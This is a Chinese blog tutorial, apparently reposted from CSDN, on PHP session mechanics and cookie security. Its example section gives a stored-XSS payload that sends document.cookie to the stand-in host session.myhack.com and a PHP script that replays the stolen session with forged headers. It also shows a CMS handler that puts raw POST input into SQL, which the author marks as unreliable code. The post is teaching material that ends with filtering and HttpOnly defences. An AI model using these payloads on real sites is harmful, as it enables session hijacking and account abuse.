session的基本原理及安全性

时间 2019-11-20

原文原文链接

1.session原理

提到session，你们确定会联想到登陆，登陆成功后记录登陆状态，同时标记当前登陆用户是谁。功能大致上就是这个样子，可是今天要讲的不是功能，而是实现。经过探讨session的实现方式来发掘一些可能你以前不知道的有趣的事情。javascript

为了记录session，在客户端和服务器端都要保存数据，客户端记录一个标记，服务器端不但存储了这个标记同时还存储了这个标记映射的数据。好吧，仍是说点白话吧，在客户端记录的实际上是一个sessionid，在服务器端记录的是一个key-value形式的数据结构，这里的key确定是指sessionid了，value就表明session的详细内容。用户在作http请求的时候，老是会把sessionid传递给服务器，而后服务器根据这个sessionid来查询session的内容（也就是上面说到的value）。
如今咱们重点关注一下sessionid，他是今天问题的关键所在。sessionid在客户端（http的客户端通常就是指浏览器了）是存储在cookie中，固然也有例外（书本上确定会提到也有保存在url中的，我作程序员这么多年也没有见过这种方式，这难道就是现实和实际的差距吗，好残酷）。php

咱们经过一个例子来阐述一下这个sessionid在session处理时的做用。首先假定这么一个场景，咱们有一个cms（content management system，内容管理系统），这个应用有一个后台，用户必须登陆才能进入后台进行文章发表等操做。首先是登陆流程，用户在浏览器输入用户名、密码，点击登陆，浏览器会将用户名密码提交到服务器程序进行处理；服务器验证用户名、密码正确后，会返回登陆成功信息，而且会修改服务器端的session内容，好比咱们将用户ID写入session中，为了方便存储这些session的内容会被序列化成字符串或者二进制保存在文件或者数据库中，这时候大多数状况下服务器在对当前的http请求进行响应时，会返回一个新的sessionid要求浏览器写入本地cookie中，对应的返回的http响应头部信息应该会是是这个样子的：set-cookie:PHPSESSID=xxxxxxx,浏览器解析到这个头以后就会在当前生成一个cookie关联当前的域名。

图1.1 登陆时序图html

接着用户登陆后台进行发表文章操做，登陆用户填写文章的标题、内容，而后点击发送。这时候浏览器会生成一条到服务器的http请求，注意这个请求的头部会将存储sessionid的cookie内容发送过去，也就是说请求的http头部信息中应该会有这么一段数据：cookie:PHPSESSID=xxxxxxx;other_cookie_name=yyyyyy；服务器接收到这个http请求以后，解析到cookie存在，且cookie中存在PHPSESSID这个cookie名字，而后就将PHPSESSID的值（也就是sessionid的值）取出来，根据这个PHPSESSID查询服务器上有没有对应的session内容，若是有则将其对应的值取出来进行反序列序列化（也就是将其转成编程语言中的一个数据结果，好比在php中会获得一个$_SESSION数组，在j2ee中会获得类型为javax.servlet.http.HttpSession），方便在程序中进行读取，最终服务器认定session中储存的值存在，而且从反序列化获得的对象中读取到了用户ID属性，而后就往cms数据库的文章表中插入了一条数据，最终返回http响应，告诉浏览器操做成功了。

图1.2 发表文章时序图java

2.入侵示例

关于cookie的一些属性，能够参考个人另外一篇博文关于cookie的一些事，里面会提到一个httponly的属性，也就是是否禁止js读取cookie。不幸的是不少常见的服务器（好比apache和tomcat）在生成这个存储sessionid的cookie的时候，没有设置httponly这个属性，也就是说js是能够将这个sessionid读取出来的。git

js读取到sessionid，这会有问题吗？若是没有问题，我就不在这里啰嗦了。你网站上的运行的js代码并不必定是你写的，好比说通常网站都有一个发表文章或者说发帖的功能，若是别有用心的人在发表的时候填写了html代码（这些html通常是超连接或者图片），可是你的后台又没有将其过滤掉，发表出来的文章，被其余人点击了其中恶意连接时，就出事了。这也就是咱们常说的XSS。程序员

   <?php
    session_start();
    $result = array();
    if (!isset($_SESSION['uid']) || !$_SESSION['uid']) {
        $result['code'] = 2;
        $result['msg'] = '还没有登陆';
    } else {
        $uid = $_SESSION['uid'];
        require_once('../globaldb.php');
        if (!isset($_POST['title']) || !$_POST['title']) {
            $result['code'] = 4;
            $result['msg'] = '标题为空';
            goto end;
        }
        if (!isset($_POST['content']) || !$_POST['content']) {
            $result['code'] = 4;
            $result['msg'] = '内容为空';
            goto end;
        }

        if ($db->getStatus()) {
            $title = $_POST['title'];
            $content = $_POST['content'];
            $sql = 'insert into article(title,content,uid,create_time) values("'.$title.'","'.$content.'",'.$uid.',now())';
            $rv = $db->dbExecute($sql);
            if ($rv > 0) {
                $result['code'] = 0;
            } else {
                $result['code'] = 3;
                $result['msg'] = '插入失败';
            }
        } else {
            $result['code'] = 1;
            $result['msg'] = '数据库操做失败';
        }
    }
    end:
    echo (json_encode($result));

代码2.1 添加文章的后台代码sql

这里给出了一段不靠谱代码，之因此这么说是因为对于提交的内容没有作过滤，好比说content表单域的内容。如今假设有这么两个网站，一个你本身的CMS网站，域名mycms.whyun.com,一个黑客用的网站，域名session.myhack.com。你能够经过配置hosts来模拟这两个网站，说到这里可仍是推荐一下我以前作过的addhost工具，能够自动生成hosts和vhost配置。代码2.1正是mycms网站的代码。
登陆mycms后在后台添加一篇文章，文章内容为：数据库

<a href=\"#\" onclick=\'javascript:alert(document.cookie);return false;\'>点击我，有惊喜！</a>

代码2.2 alert cookie

图2.1 显示cookie的htmlapache

打开刚才生成的文章连接，而后点击点击我，有惊喜！,会显示当前域下的全部cookie。

图2.2 cookie被alert出来编程

固然要想作到攻击的目的仅仅作这些是不够的，下面将这个连接的内容作的丰富多彩些。

<a href=\"#\" onclick=\'javascript:var link = this; var head = document.getElementsByTagName(\"head\")[0]; var js = document.createElement(\"script\"); js.src = \"http://session.myhack.com/httphack.php?cook=\"+encodeURIComponent(document.cookie); js.onload = js.onreadystatechange = function(){ if (!this.readyState || this.readyState == \"loaded\" || this.readyState == \"complete\") {head.removeChild(js);  alert(\"over\"); } }; head.appendChild(js);return false;\'>点击我，有惊喜2！</a>

代码2.3 跨站请求
这里为了将代码嵌入html，得将其写做一行，其简洁模式为：

var link = this;
    var head = document.getElementsByTagName("head")[0]; 
    var js = document.createElement("script"); 
    js.src = "http://session.myhack.com/httphack.php?cook="+encodeURIComponent(document.cookie); 
    js.onload = js.onreadystatechange = function(){ 
        if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") { 
            head.removeChild(js); 
            alert('开始跳转真正的地址');location.href=link.getAttribute("href");//
        }
    }; 
    head.appendChild(js);

代码2.4 跨站请求简洁版

为了真正的体现他是超连接仍是跳转到一个地址为妙，因此在简洁班中脚本加载结束后作了跳转，可是为了演示方便，咱们在代码2.3中没有这么作。
如今再点击连接点击我，有惊喜！，查看一下一下网络请求，会发现一个到session.myhack.com/httphack.php地址的请求，返回数据为var data = {"code":0};。

图2.3 跨站请求

接着看看httphack.php干了啥：

<?php
    error_reporting(E_ALL);
    header("Content-type:application/javascript");

     function getRealIp()
    {
        $ip = '127.0.0.1';
        $ipname = array(
            'REMOTE_ADDR',
            'HTTP_CLIENT_IP',
            'HTTP_X_FORWARDED_FOR',
            'HTTP_X_FORWARDED',
            'HTTP_X_CLUSTER_CLIENT_IP',
            'HTTP_FORWARDED_FOR',
            'HTTP_FORWARDED'
        );
       foreach ($ipname as $value)
       {
           if (isset($_SERVER[$value]) && $_SERVER[$value]) {

                $ip = $_SERVER[$value];
                break;
           }
       }
       return $ip;
    }
    $ip = getRealIp();
    $cookies = isset($_GET['cook']) ? $_GET['cook'] : '';
    $headers = array(
        'User-Agent:'.$_SERVER['HTTP_USER_AGENT'],
        'X-FORWARDED-FOR:'.$ip,
        'Remote-Addr:'.$ip,
        'Cookie:'.$cookies
    );
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://mycms.whyun.com/back/article/article_add.php");
    // 设置cURL 参数，要求结果保存到字符串中仍是输出到屏幕上。
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  //构造IP
    curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_REFERER']);   //构造来路
    curl_setopt($ch, CURLOPT_HEADER, 0);

    curl_setopt($ch, CURLOPT_POST, true);
    $params = array('title'=>'这是跨站攻击测试','content'=>'网站被跨站攻击了');
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

    $out = curl_exec($ch);
    curl_close($ch);

    $data = json_encode($headers);
    echo "var data = $out;";

代码2.5 伪造session提交

从代码2.5中能够看出，咱们伪造了http请求的header内容，吧浏览器中mycms域的cookie原封不动传过去了，同时在header还伪造了user-agent和ip，mycms中在校验session的时候，发现sessionid和user-agent信息都是对的，因此认为session是存在且合法的！至此为止，咱们完成了跨站请求攻击。

3.防范

第二章节中，咱们的攻击思路是这样的，咱们示例了经过js获取cookie，而后生成一个第三方网站的网络请求，而后再从第三方网站发起一个网络请求到咱们本身的网站上。整个更急流程大致是这样的：

图3.1 跨站请求流程

从图3.1能够看出，让整个流程没法进行下去的措施有两个，一个就是增强对提交信息和页面显示信息的过滤，让非法提交内容无处施展；第二个就是让存储在cookie中的sessionid不能被js读取到，这样即便第一步出现漏洞的状况下，依然不会被攻击者走完整个攻击流程。
在php中设置sessionid的httponly属性的方法有不少，具体能够参考 stackoverflow上的一个提问。jsp中也是有不少方法，能够参考开源中国红薯发表的一篇文章。这里仅仅贴出来php中一个解决方法，就是在session_start()以后从新设置一下cookie:

<?php
    $sess_name = session_name();//必须在session_start以前调用session_name
    if (session_start()) {
        setcookie($sess_name, session_id(), null, '/', null, null, true);
    }

代码3.1 设置httponly属性为true

document.cookie="Tid=123;httponly=true;"

原文地址：http://blog.csdn.net/yunnysunny/article/details/26935637